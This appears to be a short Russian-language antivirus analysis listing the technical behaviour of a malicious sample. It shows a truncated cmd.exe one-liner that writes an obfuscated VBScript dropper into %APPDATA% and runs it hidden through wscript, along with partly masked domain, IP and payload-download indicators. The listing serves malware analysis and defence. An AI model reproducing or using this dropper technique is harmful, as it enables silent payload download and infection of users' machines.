Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "AHUJTEh=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim RKCrC" "FUNCTIOn BS5HsEc(JUb)" "ULj=35" "BS5HsEc=ASc(JUb)" "U2zW=21" "End fUnctIoN" "FuNcTiOn Fv6(Sid)" "B9Nk1k=48" "Fv6=ChR(Sid)"...
- %APPDATA%\8816.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\8816.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "AHUJTEh=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim RKCrC" "FUNCTIOn BS5HsEc(JUb)" "ULj=35" "BS5HsEc=ASc(JUb)" "U2zW=21" "End fUnctIoN" "FuNcTiOn Fv6(Sid)" "B9Nk1k=48" "Fv6=ChR(Sid)"...' (со скрытым окном)